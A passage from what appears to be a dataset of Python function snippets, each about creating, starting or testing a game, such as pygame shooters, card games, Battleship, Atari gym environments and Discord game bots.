MilleniumFalcon()\r\n \r\n ## Create TIE Fighters\r\n game.fighters = Fighter.init(game)\r\n\r\n ## Create Asteroids\r\n game.rocks = Group.mesh(Rock1.init(game), Rock2.init(game))\r\n\r\n ## Create Lasers\r\n game.pro_lasers = ProLaser.init(game)\r\n game.con_lasers = ConLaser.init(game)\r\n\r\n ## Setup collision groups\r\n Group.bind(game.pro_lasers, game.rocks, game.act_laser_void)", "def start(self):\n self.player = Player()\n self.dealer = Dealer()\n self.pot = 0\n self.side_bet = 0\n start_game()", "def init_new_game(self):\n self.game = get_new_game(self.game_config)", "def start_game(self):\n self.board = Board(num_tableaus=self.tableau_qty, num_decks=self.decks, deal_3=self.deal_3)\n self.board.init_move_dict()\n self.board.deal(self.deck)\n\n if self.api_use:\n self.init_game_api()\n elif self.commandline:\n self.init_cl_game()\n else:\n self.init_pygame()", "def setUp(self):\r\n self.spaceship = SpaceShipGame()", "def setUp(self):\r\n self.spaceship = SpaceShipGame()", "def setUp(self):\r\n self.spaceship = SpaceShipGame()", "def setUp(self):\r\n self.spaceship = SpaceShipGame()", "def setUp(self):\r\n self.spaceship = SpaceShipGame()", "def main():\n g = Game(800, 600)\n g.start()", "def spawn_players(self) -> None:\n #Create the player\n self.player1 = Player(self.sensitivity, self.screen_width, self.screen_height, self.screen_width//(3/2), self.screen_height-50, self.player_lives, self.fps, self.player1_bullet, Direction.UP, self.debug)\n\n #Create the AI\n self.player2 = AIPlayer(self.sensitivity, self.screen_width, self.screen_height, self.screen_width//3, self.screen_height-50, self.player_lives, self.fps, self.player2_bullet, Direction.UP, 1, True, self.debug)", "def create_one_game(self):\n return Game2048(task_name=self.result_path, game_mode=False)", "def setup_new_game(self):\r\n self._player = Player()\r\n self._stats = GameStats(self._bb_settings)\r\n self._scoreboard = Scoreboard(self._bb_settings, self._screen)", "def create_new_game(self):\r\n global game_instance\r\n game_instance = game.Game()\r\n game_instance.set_word(db.get_random_word())\r\n print(\"\\n---------NEW GAME---------\")\r\n self.current_word = \"----\"", "def 
simulate(self):\r\n\t\tprint(\"##################################\")\r\n\t\tprint(\"SIMULATING GAME - SpaceInvaders..\")\r\n\t\tprint(\"##################################\")\r\n\t\t\r\n\t\t# Play 3 episodes:\r\n\t\tfor i in range(3):\r\n\t\t\tprint(\"Playing Episode %d\" % i)\r\n\t\t\tstate = self.env.reset()\r\n\t\t\t#self.env.render()\r\n\t\t\tdone = False\r\n\t\t\ttot_reward = 0\r\n\t\t\tstate,_ = stack_frames(self.stack_size,self.stacked_frames, \r\n\t\t\t\t\t\t\t\t\t\tstate, True)\r\n\t\t\t# play until dead.\t\t\t\r\n\t\t\twhile not done:\r\n\t\t\t\t# get the value predicted by the model and perform that action.\r\n\t\t\t\t# keras conv2d expects a 4D input. So add an empty axis. \r\n\t\t\t\tstate = np.expand_dims(state, axis=0)\r\n\t\t\t\t# predict action directly from the saved neural network.\r\n\t\t\t\taction = np.argmax(self.dqn.getModel().predict(state)[0])\r\n\t\t\t\t# perform that action.\r\n\t\t\t\tstate, reward, done, _ = self.env.step(action)\r\n\t\t\t\tself.env.render()\r\n\t\t\t\tstate,_ = stack_frames(self.stack_size,self.stacked_frames, \r\n\t\t\t\t\t\t\t\t\t\tstate, False)\r\n\t\t\t\ttot_reward+=reward\r\n\t\t\tprint(\"Reward: \", tot_reward)\r\n\t\tself.env.close() # to avoid sys.meta_path error\r", "def __init__(self):\n\n # Change directory into the directory above this file - the\n # one containng the 'res' tree. Note that if we've been built via\n # py2exe, we will actually be in a zip file so account for that.\n path = os.path.dirname(os.path.dirname(__file__))\n if (os.path.basename(path) == \"library.zip\"):\n path = os.path.dirname(path)\n os.chdir( path )\n sys.path += [\".\"]\n\n # Services exposed to the entities.\n self.game_services = SpaceGameServices(self)\n\n # The resource loader.\n self.resource_loader = resource.ResourceLoader()\n\n # The configuration.\n if os.path.isfile(\"./config.txt\"):\n self.config = self.resource_loader.load_config_file_from(\"./config.txt\")\n else:\n self.config = self.resource_loader.load_config_file(\"base_config.txt\")\n\n # Create the renderer.\n renderer_name = self.config.get_or_default(\"renderer\", \"src.pygame_renderer.PygameRenderer\")\n renderer_class = utils.lookup_type(renderer_name)\n screen_size = (self.config.get_or_default(\"screen_width\", 1024),\n self.config.get_or_default(\"screen_height\", 768))\n self.renderer = renderer_class(screen_size, self.config, data_path=\"./res\")\n\n # The resource loaded needs a renderer to load images etc.\n self.resource_loader.set_renderer(self.renderer)\n\n # The input handling system.\n self.input_handling = None\n\n # The enemy.\n self.wave_spawner = None\n\n # Create the entity manager.\n self.entity_manager = ecs.EntityManager(self.game_services)\n\n # Configure the resource loader.\n self.resource_loader.set_minimise_image_loading(\n self.config.get_or_default(\"minimise_image_loading\", False)\n )\n\n # The drawing visitor.\n self.drawing = drawing.Drawing(self.game_services)\n\n # Is the game running?\n self.running = False\n\n # Should we load the game?\n self.want_load = False\n\n # Should we pause the game?\n self.want_pause = False\n\n # Should we unpause the game?\n self.want_resume = False\n\n # Should we simulate one frame and then pause?\n self.want_step = False", "def _new(self, *args):\n if self.game:\n raise ServerException('already playing a game')\n self.game, self.player = self.server.new_game(self)", "def setUp(self):\r\n self.spaceship = SpaceShipGame()\r\n self.spaceship.init()", "def test_init_with_existing_game(self):\n pass\n # Ensure judge is 
the same", "def load_game(self):\n game = Game(self.w, self.h, self.screen)\n game.run()", "def new_game(cls, user):\n game = Game(user=user,\n game_state=\".........\",\n game_over=False)\n game.put()\n return game", "def make_game():\n return ascii_art.ascii_art_to_game(\n GAME_ART, what_lies_beneath='.',\n sprites={'P': PlayerSprite})", "def __init__(self, players, gamespace, start_state, transitions, setup, finish, get, post):\n\n self.players = players\n self.gamespace = gamespace\n self.start_state = start_state\n self.transitions = transitions\n self.setup = setup\n self.finish = finish\n self.get = get\n self.post = post\n\n self.turn = 1", "def start_new_game(self):\r\n\r\n self.initialize_game_params()\r\n self.timer = Timer(self.screen)\r\n self.mine_counter = MineCounter(self.num_of_mines, self.screen)\r\n self.reset_button = ResetButton(self.screen)\r\n self.high_score = HighScore(self.rows, self.cols, self.num_of_mines, self.screen)\r\n self.board = Board(self.rows, self.cols, self.num_of_mines, self.screen)\r\n self.play_game()", "def new_game(self, req):\n return models.BattleShip.create(req.left, req.right)", "def run(self):\n pygame.init()\n pygame.display.set_caption(\"Genetic Game\")\n self.screen = pygame.display.set_mode((self.SCREEN_W, self.SCREEN_H), 0, 32)\n\n self.ominus_sprites = [OminusSprite(self.screen, o, PLAYERS_COLORS[o.id]) for o in self.model.get_players()]\n for o in self.ominus_sprites:\n self.agent_group.add(o)\n\n self.wall_sprites = [WallSprite(self.screen, w) for w in self.model.get_walls()]\n for w in self.wall_sprites:\n self.terrain_group.add(w)", "def new_game(self):\n self.ui = UI()\n self.board.retract_board()\n self.board = Board()\n self.turn = BLUE\n self.selected_legal_moves = []\n self.selected_piece = None", "def __init__(self, agent, make_env=lambda:gym.make(\"SpaceInvaders-v0\"), n_games=1, max_size=None,\n preprocess_observation = lambda obs:obs,agent_step=None):\n if not isinstance(make_env, function):\n env_name = make_env\n make_env = lambda: gym.make(env_name)\n\n #create atari games\n self.make_env = make_env\n self.envs = [self.make_env() for _ in range(n_games)]\n self.preprocess_observation = preprocess_observation\n\n\n #initial observations\n self.prev_observations = [self.preprocess_observation(make_env.reset()) for make_env in self.envs]\n\n #agent memory variables (if you use recurrent networks\n self.prev_memory_states = [np.zeros((n_games,)+tuple(mem.output_shape[1:]),\n dtype=get_layer_dtype(mem))\n for mem in agent.agent_states]\n\n #save agent\n self.agent = agent\n self.agent_step = agent_step or agent.get_react_function()\n\n # Create experience replay environment\n self.experience_replay = SessionPoolEnvironment(observations=agent.observation_layers,\n actions=agent.action_layers,\n agent_memories=agent.agent_states)\n self.max_size = max_size\n\n #whether particular session has just been terminated and needs restarting\n self.just_ended = [False] * len(self.envs)", "def main():\n field = Field(10, 10)\n snake = Snake((0, 0))\n game = Game(field, snake)\n game.start()", "def do_create_game(self):\n\t\tself.nickname = self.e_nickname.text\n\n\t\tself.hide_all()\n\t\tself.show_create()\n\t\tself.renderer.color = (255, 255, 255, 0)", "def start(self):\n self.save_checkpoint(\"setup\")\n\n logging.info(\"Starting game...\")\n body = render_message(\n \"welcome.html\",\n game_name=self.name,\n night_end=self.night_end.strftime(\"%I:%M %p\"),\n day_end=self.day_end.strftime(\"%I:%M %p\"),\n players=self.game.players,\n 
)\n self.send_message(mafia.events.PUBLIC, \"%s: Start\" % self.name, body)\n self.game.begin()\n self.started = True\n\n self.save_checkpoint(\"start\")", "async def createGameSpace(self, ctx):\n self.category = await ctx.guild.create_category_channel(name=self.categoryName)\n print(\"Category created\")\n await self.category.set_permissions(self.roleForPlayer, read_messages=True, connect=True)\n roleEveryone = discord.utils.get(ctx.guild.roles, name=\"@everyone\")\n await self.category.set_permissions(roleEveryone, read_messages=False, connect=False)\n\n self.textChannel = await ctx.guild.create_text_channel(name=\"Partie\", category=self.category)\n print(\"Text channel created\")\n self.voiceChannel = await ctx.guild.create_voice_channel(name=\"Village\", category=self.category)\n print(\"Voice channel created\")\n await self.voiceChannel.edit(user_limit=len(self.players) + 2, sync_permissions=True)\n await self.textChannel.edit(nsfw=True, sync_permissions=True)", "async def new(ctx):\n if ctx.message.channel.name.lower() not in tod_channels:\n return\n\n room = ctx.message.channel.name.lower()\n host = ctx.message.author\n if room not in tod_games:\n tod_games[room] = {'host': host.name, 'host_id': host.name, 'participants': {}, 'last': None}\n tod_games[room]['current'] = host.name\n tod_games[room]['last'] = host.name\n tod_games[room]['participants'][host.name.lower()] = {'spins': 0}\n await amor_manager.say(\"New Game of Truth Or Dare started in {}\".format(room))\n else:\n host = tod_games[room]['host']\n await amor_manager.say(\"Truth or Dare already in progress in {}. Game host: {}\".format(room, host))", "def create_game(agent, other_agent, games_counter, verbose_mode,\n from_db=False, cards_in_hand=13):\n if from_db:\n pass\n # todo(maryna): create single game from db. 
pay attention to players\n # initialization + the iterator.\n trick_counter = [0, 0, ] # [Team 0, Team 1]\n previous_tricks = []\n game = Game(agent, other_agent, games_counter, trick_counter, verbose_mode,\n previous_tricks, Trick({}), cards_in_hand=cards_in_hand)\n return game", "def new_game(self):\n self.bet_history = []\n self.in_game = [True] * len(self.agents)\n self.in_game_count = len(self.agents)\n self.bet_hist = []\n self.pot = big_blind + small_blind\n self.chips[self.starting_player] -= small_blind\n self.chips[(self.starting_player + 1) % len(self.agents)] -= big_blind\n self.all_in = [False] * len(self.agents)\n\n self.hands = None\n self.community_cards = []\n\n self.shuffle_deck()\n\n for i in range(0, len(agents)):\n self.agents[i].new_game(len(agents), i)", "def test_valid_game_setup(self):\n self.assertEqual(self._game.active_players(), 1)\n for x in xrange(1, 4):\n self._game.add_player(self._users[x], x)\n self.assertEqual(self._game.active_players(), 4)\n self.assertIsREADY(self._game)", "def start(self):\n self.__init__()\n self.set_n_players()\n self.init_players()\n self.init_territory_selection_phase()\n self.init_troop_deployment_phase()\n # self.game_phase()", "def setup_game(self, player, opponent):\n\n self.display.clear_screen()\n\n ship_index = 0\n\n while not player.ready(len(self.SHIP_INFO)):\n # prints the currrent board\n board = self.display.construct_player_board(player, opponent, True)\n self.display.print_board(board)\n\n ship_name, ship_length = self.SHIP_INFO[ship_index]\n ship_to_add = Ship(ship_name, ship_length)\n\n try:\n player.add_ship(ship_to_add)\n except Exception as e:\n ship_to_add = player.ships[ship_index]\n\n origin, orientation = self.display.prompt_for_ship_placement(\n ship_to_add)\n\n try:\n player.place_ship(ship_to_add, origin, orientation,\n self.BOARD_SIZE)\n except ValueError as ve:\n self.display.clear_screen()\n print(ve)\n print()\n continue\n\n self.display.clear_screen()\n ship_index += 1\n self.display.prompt_switch(opponent.name)", "def populate_games():\n global games\n games[0] = SnakeGame(lp)", "def __init__(self, game):\n self.rooms = self.load_rooms(f\"data/{game}Rooms.txt\")\n self.items = self.load_items(f\"data/{game}Items.txt\")\n self.inventory = self.load_inventory()\n self.current_room = self.rooms[0]\n self.idlist = []\n self.player = Inventory()", "def start_game(self):\n self._add_mines()", "def test_runGame(self):\n # this is tested by playing the game. 
No good way to unit test this.\n pass", "def basic_begin_game(game_context) :\n game_context.world.set_game_defined()\n execute_context(game_context)", "def new(self):\n self.playing = True\n self.score = 0\n # GROUPS AND LAYERS\n self.all_sprites = pg.sprite.LayeredUpdates() # Lets you assign layer to group to render in correct order\n self.planets = pg.sprite.Group()\n self.moons = pg.sprite.Group()\n self.mobs = pg.sprite.Group()\n self.stars = pg.sprite.Group()\n self.pickups = pg.sprite.Group()\n self.arrows = pg.sprite.Group()\n # SCREEN\n self.frame_coordinates = vec(0, 0)\n self.first_planet = Planet(self) # Add 1st Planet\n self.player = Player(self, self.first_planet) # Add Player on First Planet\n self.added_planets = 0\n self.spawn_planets(PLANETS + self.added_planets)\n self.arrow = Arrow(self)\n self.sun = Sun(self)\n\n # Messages\n self.corner_msg = 'Traverse & Score!'\n self.corner_msg_flag = False\n self.corner_msg_start_time = pg.time.get_ticks()\n\n self.arrow_msg = False\n\n # Play Music\n pg.mixer.music.load(path.join(self.snd_dir, LEVEL_1_MUSIC))\n\n # Start Game Loop\n self.run()\n print(\"GOT TO END OF NEW()\")", "def game_created(self, pname, game):\n logging.debug('Game Created:')\n logging.debug(game)\n g = self.games.get(game['matchid'], None)\n if g:\n g.roomid = game['roomid']\n g.tableindex = game['tableindex']\n self.comm.game_ready(g)", "def new_game(self):\n self.cells = [] # Array of cells\n self.frame_count = 0\n self.database = []\n self.timer = [Consts[\"MAX_TIME\"], Consts[\"MAX_TIME\"]]\n self.result = None\n # Define the players first\n self.cells.append(Cell(0, [Consts[\"WORLD_X\"] / 4, Consts[\"WORLD_Y\"] / 2], [0, 0], Consts[\"DEFAULT_RADIUS\"]))\n self.cells.append(Cell(1, [Consts[\"WORLD_X\"] / 4 * 3, Consts[\"WORLD_Y\"] / 2], [0, 0], Consts[\"DEFAULT_RADIUS\"]))\n # Generate a bunch of random cells\n for i in range(Consts[\"CELLS_COUNT\"]):\n if i < 4:\n rad = 1.5 + (random.random() * 1.5) # Small cells\n elif i < 10:\n rad = 10 + (random.random() * 4) # Big cells\n else:\n rad = 2 + (random.random() * 9) # Everything else\n x = Consts[\"WORLD_X\"] * random.random()\n y = Consts[\"WORLD_Y\"] * random.random()\n cell = Cell(i + 2, [x, y], [(random.random() - 0.5) * 2, (random.random() - 0.5) * 2], rad)\n safe_dist = Consts[\"SAFE_DIST\"] + rad\n while min(map(cell.distance_from, self.cells[:2])) < safe_dist:\n cell.pos = [\n Consts[\"WORLD_X\"] * random.random(),\n Consts[\"WORLD_Y\"] * random.random()\n ]\n self.cells.append(cell)", "async def new_game():\n if enough_players():\n GAME.new_game()\n await update_players()", "async def creatingGame(self, ctx):\n if self.progression == \"\":\n self.progression = \"Création d'une partie\"\n msg1 = await ctx.channel.send(\n content=\"Seules les réactions ayant plus de 2 voix seront comptabilisées.\"\n \"```css\\nLes rôles en verts sont les membres du village.```\"\n \"```Markdown\\n#Les rôles en bleu dépendent de la partie.```\"\n \"```diff\\n-Les rôles en rouge sont les loups-garous.```\"\n \"```Fix\\n#Les rôles en orange doivent gagner seul.```\",\n embed=self.embedPage1)\n self.msgChoiceRole.append(msg1.id)\n self.msgToDelete.append(msg1)\n await self.addRolesOnEmbed(msg1)\n else:\n await self.wait(ctx)", "def test_game():\n \n # check that all of the functions are callable\n assert callable(g.AdventureGame)\n \n # Load up the rooms for the test game\n testGame = g.AdventureGame(tg.testRooms, tg.starting_room)\n \n # Test that the constructor properly loads the rooms\n assert testGame.rooms == 
tg.testRooms\n assert testGame.starting_room == tg.starting_room\n assert testGame.current_room == tg.starting_room", "def test_game_creation(self):\n self.assertTrue(len(models.Game.objects.all()) == 1)\n game = models.Game.objects.all()[0]\n\n # Hydrocarbon piles initialization test\n number_of_piles = len(settings.HYDROCARBON_STOCKS_PER_PLAYER)\n for i_pile in range(number_of_piles):\n self.assertEqual(0, game.hydrocarbon_piles.get(index=i_pile).stock_amount)\n\n # Events initialization test [TO DO]\n\n # Source buildings loading test\n version_source_buildings = models.SourceBuilding.objects.filter(version=game.version)\n self.assertEqual(version_source_buildings.count(), game.source_buildings.count())\n for version_source_building in version_source_buildings:\n self.assertEqual(version_source_building, game.source_buildings.get(slug=version_source_building.slug))\n\n # Source events loading test [TO DO]\n\n # Source technologies loading test\n version_source_technologies = models.SourceTechnology.objects.filter(version=game.version)\n self.assertEqual(version_source_technologies.count(), game.source_technologies.count())\n for version_source_technology in version_source_technologies:\n self.assertEqual(version_source_technology,\n game.source_technologies.get(slug=version_source_technology.slug))", "def create_game(self, user, attempts_remaining, attempts_used,\n score, current_level):\n\n game = Game(user=user, attempts_remaining=attempts_remaining,\n score=score, attempts_used=attempts_used,\n current_level=current_level)\n game.put()\n return game", "def create_scene():\n create_floor()\n if config.M != \"\":\n if config.LEVEL == 1:\n create_wall()\n create_enemy()\n create_gap()\n create_platform()\n create_marijuana()\n create_star()\n create_fish()\n elif config.LEVEL == 2:\n create_boss()\n create_platform()\n create_star()", "def new_game(cls, user, raw_ships):\n ships = ShipsManager(Ship, raw_ships).create_ships()\n game = Game(player=user, players_ships=ships,\n opponents_ships=ShipsGenerator(\n Ship).generate_opponents_ships())\n game.put()\n return game", "def init_game(self):\n self.view.carregar_jogadores_possiveis(self._possible_players_list())\n self.view.put_view_in_main_loop()", "def __init__(self, players):\n\n # Instantiate a Players object with the players queue\n self._players = Players(players)\n # Instantiate the Die to be used for the current game\n self._die = Die()\n # Track the game status\n self._active_turn = True\n self._end_game = False", "def received_CREATE(self, message):\n\n\t\t_, rival_name, order = message.split(' ')\n\n\t\tplayer_token = \"X\" if order == \"first\" else \"O\"\n\t\trival_token = \"O\" if order == \"first\" else \"X\"\n\n\t\tself.player_model.player.token = player_token\n\n\t\t#Initializing rival player\n\t\tself.player_model.rival_player.name = rival_name\n\t\tself.player_model.rival_player.token = rival_token\n\t\tself.player_model.current_player = self.player_model.player if order == \"first\" else self.player_model.rival_player\n\n\t\tself.create_game()\n\n\t\tif order == \"first\":\n\t\t\tself.play()\n\n\t\telse:\n\t\t\tself.wait_to_play()\n\n\t\tself.player_frame.message_screen.write(f\"New game against {rival_name}\")\n\t\tself.player_frame.message_screen.write(f\"You go {order}\")", "def start(self, timed):\n\n if timed:\n self._game = TimedGame(self._players)\n else:\n self._game = Game(self._players)\n \n self._game.start()", "def generate(self):\n DistributedObject.DistributedObject.generate(self)\n\n # Get the state 
machine stuff for playGame\n self.loader = self.cr.playGame.hood.loader\n self.trolleyStation = self.loader.geom.find('**/*trolley_station*')\n self.trolleyCar = self.trolleyStation.find('**/trolley_car')\n self.trolleySphereNode = self.trolleyStation.find('**/trolley_sphere').node()\n\n # We'll need a pair of fog objects to enshadow the trolley\n # while it's rolling through the entrance or exit tunnels.\n\n exitFog = Fog(\"TrolleyExitFog\")\n exitFog.setColor(0.0, 0.0, 0.0)\n exitFog.setLinearOnsetPoint(30.0, 14.0, 0.0)\n exitFog.setLinearOpaquePoint(37.0, 14.0, 0.0)\n exitFog.setLinearFallback(70.0, 999.0, 1000.0)\n self.trolleyExitFog = self.trolleyStation.attachNewNode(exitFog)\n self.trolleyExitFogNode = exitFog\n \n enterFog = Fog(\"TrolleyEnterFog\")\n enterFog.setColor(0.0, 0.0, 0.0)\n enterFog.setLinearOnsetPoint(0.0, 14.0, 0.0)\n enterFog.setLinearOpaquePoint(-7.0, 14.0, 0.0)\n enterFog.setLinearFallback(70.0, 999.0, 1000.0)\n self.trolleyEnterFog = self.trolleyStation.attachNewNode(enterFog)\n self.trolleyEnterFogNode = enterFog\n\n # We'll have fog explicitly disabled for the trolley car, by\n # default. This makes it look maybe a little weird in\n # Donald's Dock--why does the trolley punch through the fog so\n # well? But it keeps the trolley from flashing in and out as\n # we turn on and off the shadow fog.\n self.trolleyCar.setFogOff()\n\n # Variables used to animate trolley parts\n # Key\n self.keys = self.trolleyCar.findAllMatches('**/key')\n self.numKeys = self.keys.getNumPaths()\n self.keyInit = []\n self.keyRef = []\n for i in range(self.numKeys):\n key = self.keys[i]\n key.setTwoSided(1)\n ref = self.trolleyCar.attachNewNode('key' + `i` + 'ref')\n ref.iPosHpr(key)\n self.keyRef.append(ref)\n self.keyInit.append(key.getTransform())\n # Front wheels\n self.frontWheels = self.trolleyCar.findAllMatches('**/front_wheels')\n self.numFrontWheels = self.frontWheels.getNumPaths()\n self.frontWheelInit = []\n self.frontWheelRef = []\n for i in range(self.numFrontWheels):\n wheel = self.frontWheels[i]\n ref = self.trolleyCar.attachNewNode('frontWheel' + `i` + 'ref')\n ref.iPosHpr(wheel)\n self.frontWheelRef.append(ref)\n self.frontWheelInit.append(wheel.getTransform())\n # Back wheels\n self.backWheels = self.trolleyCar.findAllMatches('**/back_wheels')\n self.numBackWheels = self.backWheels.getNumPaths()\n self.backWheelInit = []\n self.backWheelRef = []\n for i in range(self.numBackWheels):\n wheel = self.backWheels[i]\n ref = self.trolleyCar.attachNewNode('backWheel' + `i` + 'ref')\n ref.iPosHpr(wheel)\n self.backWheelRef.append(ref)\n self.backWheelInit.append(wheel.getTransform())\n\n # Create the trolley enter track\n trolleyAnimationReset = Func(self.resetAnimation)\n trolleyEnterStartPos = Point3(-20, 14, -1)\n trolleyEnterEndPos = Point3(15, 14, -1)\n\n trolleyEnterPos = Sequence(name=\"TrolleyEnterPos\")\n if base.wantFog:\n trolleyEnterPos.append(Func(self.trolleyCar.setFog, self.trolleyEnterFogNode))\n trolleyEnterPos.append(self.trolleyCar.posInterval(\n TROLLEY_ENTER_TIME,\n trolleyEnterEndPos,\n startPos=trolleyEnterStartPos,\n blendType=\"easeOut\"))\n if base.wantFog:\n trolleyEnterPos.append(Func(self.trolleyCar.setFogOff))\n \n trolleyEnterTrack = Sequence(trolleyAnimationReset, \n trolleyEnterPos,\n name = 'trolleyEnter')\n # \n # How many revolutions of the wheel?\n keyAngle = round(TROLLEY_ENTER_TIME) * 360\n dist = Vec3(trolleyEnterEndPos - trolleyEnterStartPos).length()\n wheelAngle = dist/(2.0 * math.pi * 0.95) * 360\n trolleyEnterAnimateInterval = 
LerpFunctionInterval(\n self.animateTrolley,\n duration = TROLLEY_ENTER_TIME,\n blendType = \"easeOut\",\n extraArgs = [keyAngle, wheelAngle],\n name = \"TrolleyAnimate\")\n trolleyEnterSoundTrack = SoundInterval(self.trolleyAwaySfx, node=self.trolleyCar)\n self.trolleyEnterTrack = Parallel(trolleyEnterTrack,\n trolleyEnterAnimateInterval,\n trolleyEnterSoundTrack,\n )\n\n # Create the trolley exit track\n trolleyExitStartPos = Point3(15, 14, -1)\n trolleyExitEndPos = Point3(50, 14, -1)\n\n trolleyExitPos = Sequence(name=\"TrolleyExitPos\")\n if base.wantFog:\n trolleyExitPos.append(Func(self.trolleyCar.setFog, self.trolleyExitFogNode))\n trolleyExitPos.append(self.trolleyCar.posInterval(\n TROLLEY_EXIT_TIME,\n trolleyExitEndPos,\n startPos=trolleyExitStartPos,\n blendType=\"easeIn\"))\n if base.wantFog:\n trolleyExitPos.append(Func(self.trolleyCar.setFogOff))\n \n \n trolleyExitBellInterval = SoundInterval(self.trolleyBellSfx, node=self.trolleyCar)\n trolleyExitAwayInterval = SoundInterval(self.trolleyAwaySfx, node=self.trolleyCar)\n\n keyAngle = round(TROLLEY_EXIT_TIME) * 360\n dist = Vec3(trolleyExitEndPos - trolleyExitStartPos).length()\n wheelAngle = dist/(2.0 * math.pi * 0.95) * 360\n trolleyExitAnimateInterval = LerpFunctionInterval(\n self.animateTrolley,\n duration = TROLLEY_EXIT_TIME,\n blendType = \"easeIn\",\n extraArgs = [keyAngle, wheelAngle],\n name = \"TrolleyAnimate\")\n\n self.trolleyExitTrack = Parallel(trolleyExitPos,\n trolleyExitBellInterval,\n trolleyExitAwayInterval,\n trolleyExitAnimateInterval,\n name = self.uniqueName(\"trolleyExit\")\n )", "async def startingGame(self, ctx):\n # =-=-=-= ATTRIBUTE ROLES FOR PLAYERS =-=-=-= #\n self.msgToDelete.append(await ctx.message.channel.send(\"Attribution des rôles ...\"))\n self.rolesOrder = self.roles.copy()\n self.rolesOrder = list(dict.fromkeys(self.rolesOrder)) # Remove redundant roles for playGame()\n random.seed(time.time())\n random.shuffle(self.players)\n random.shuffle(self.roles)\n self.roles = self.roles[:len(self.players) + 3]\n if self.roles.count(\"Franc-Maçon\") % 2 != 0: # Only One Freemason in\n for i in range(len(self.roles)):\n if self.roles[i] == \"Franc-Maçon\":\n self.roles[(i + 1) % len(self.roles)] = \"Franc-Maçon\"\n random.seed(time.time())\n random.shuffle(self.players)\n random.shuffle(self.roles)\n break\n\n for numberPlayer in range(len(self.players)):\n # At least there is less player than role, so I need to get the number of players instead of roles.\n\n self.syncRole(user=self.players[numberPlayer], roleToAdd=self.roles[numberPlayer],\n listToAdd=self.playersAndRoles)\n\n # =-=-=-= ATTRIBUTE ROLES FOR DECK =-=-=-= #\n for numberCentralRole in range(len(self.players), len(self.players) + 3):\n if numberCentralRole == len(self.players) + 0:\n position = \"gauche\"\n elif numberCentralRole == len(self.players) + 1:\n position = \"milieu\"\n else:\n position = \"droite\"\n self.syncRole(user=position, roleToAdd=self.roles[numberCentralRole], listToAdd=self.centralDeck)\n\n # =-=-=-= Preparing requires =-=-=-= #\n await self.createRole(ctx=ctx)\n self.msgToDelete.append(await ctx.message.channel.send(\"Création du village ...\"))\n print(\"Create village ...\")\n self.lastVoiceChannel = ctx.author.voice.channel\n await self.deleteCategory(ctx=ctx, reason=\"Pas de dualité de channel.\")\n await self.createGameSpace(ctx=ctx)\n await self.movePlayer(ctx=ctx, voiceChannel=self.voiceChannel, reason=\"Début de partie.\")\n\n print(\"Game started\")\n self.msgToDelete.append(await 
ctx.message.channel.send(\"Début de la partie.\"))\n\n await ctx.channel.send(\"Cleaning all messages ...\")\n await self.delAllMsg(waitingTime=5)\n await self.playGame(ctx=ctx)", "def run_game_logic(self):\n pass", "def create_new_game(game_name, player_name, points_to_win=POINTS_TO_WIN,\n min_players=MIN_PLAYERS, max_players=MAX_PLAYERS):\n do_house_keeping()\n if not can_create_new_game():\n return {}\n game_name = game_name or generate_game_name()\n player_name = player_name or generate_player_name()\n points_to_win = points_to_win or POINTS_TO_WIN\n min_players = min_players or MIN_PLAYERS\n max_players = max_players or MAX_PLAYERS\n if min_players < 2:\n min_players = 2\n if max_players > 10:\n max_players = 10\n game_id = generate_id(GAME_ID_LENGTH)\n game_data = {\n 'id': game_id,\n 'name': game_name,\n 'deck': create_deck(),\n 'stack': [],\n 'created_at': serialize_datetime(datetime.utcnow()),\n 'started_at': None,\n 'ended_at': None,\n 'active': False,\n 'reverse': False,\n 'min_players': min_players,\n 'max_players': max_players,\n 'players': [],\n 'points_to_win': points_to_win\n }\n add_player_to_game(game_data, player_name, True)\n msg = make_info_message(\n 'Click \"Start\" after all player(s) have joined')\n flash_broadcast(game_data, msg)\n result = save_state(game_data)\n if result:\n return game_data\n return {}", "def main():\n pygame.init()\n os.environ['SDL_VIDEO_CENTERED'] = '1'\n pygame.display.set_caption('8-Puzzle game')\n screen = pygame.display.set_mode((800, 500))\n fpsclock = pygame.time.Clock()\n program = SlidePuzzle((3, 3), 160, 5, difficulty=10) # program is also the gym environment\n\n choice = program.selectPlayerMenu(fpsclock, screen)\n if choice == \"AI\":\n pygame.display.quit()\n trainAI(program)\n elif choice == \"human\":\n launchWithGUI(program, fpsclock, screen)\n del program", "def new_game(self, wid, data=None):\n \n self.stop_game(0)\n\n # Slight delay for improved UX\n Fl.add_timeout(0.3, self.play_seq)", "def start_game(self) -> None:\n self.init_game()\n self.play()", "def create_game(cls, user, misses_allowed, secret_word, current_solution):\n game = cls(parent=user,\n user=user,\n misses_allowed=misses_allowed,\n misses_remaining=misses_allowed,\n secret_word=secret_word,\n current_solution=current_solution)\n game.put()\n return game", "def create_game(game_ID):\n\n if r.exists(\"state:\" + game_ID) == 1:\n raise Exception(\"Game exists already\")\n\n new_game = {\n \"winner\": \"none\",\n \"turn\": \"blue\",\n \"action\": \"spymaster\",\n \"hint\": \"\",\n \"attemptsLeft\": 0,\n \"redPoints\": 0,\n \"bluePoints\": 0,\n }\n words = create_board()\n set_fields = r.hset(\"state:\" + game_ID, mapping=new_game)\n set_fields += r.hset(\"words:\" + game_ID, mapping=words)\n\n if set_fields == 32:\n return {\"playerState\": new_game, \"wordsState\": words}\n else:\n raise Exception(\"Could not make Game\")", "def __init__(self, players=None):\n self.game = Game()\n if players:\n self.player1 = players[0]\n self.player2 = players[1]\n else:\n self.player1 = Player('X')\n self.player2 = Player('O')\n self.record = Record()\n self.winning_moves = []", "def __init__(self, game='pong', obs_type='ram', frameskip=(2, 5), repeat_action_probability=0.):\n\n utils.EzPickle.__init__(self, game, obs_type)\n assert obs_type in ('ram', 'image')\n\n self.game_path = atari_py.get_game_path(game)\n if not os.path.exists(self.game_path):\n raise IOError('You asked for game %s but path %s does not exist'%(game, self.game_path))\n self._obs_type = obs_type\n 
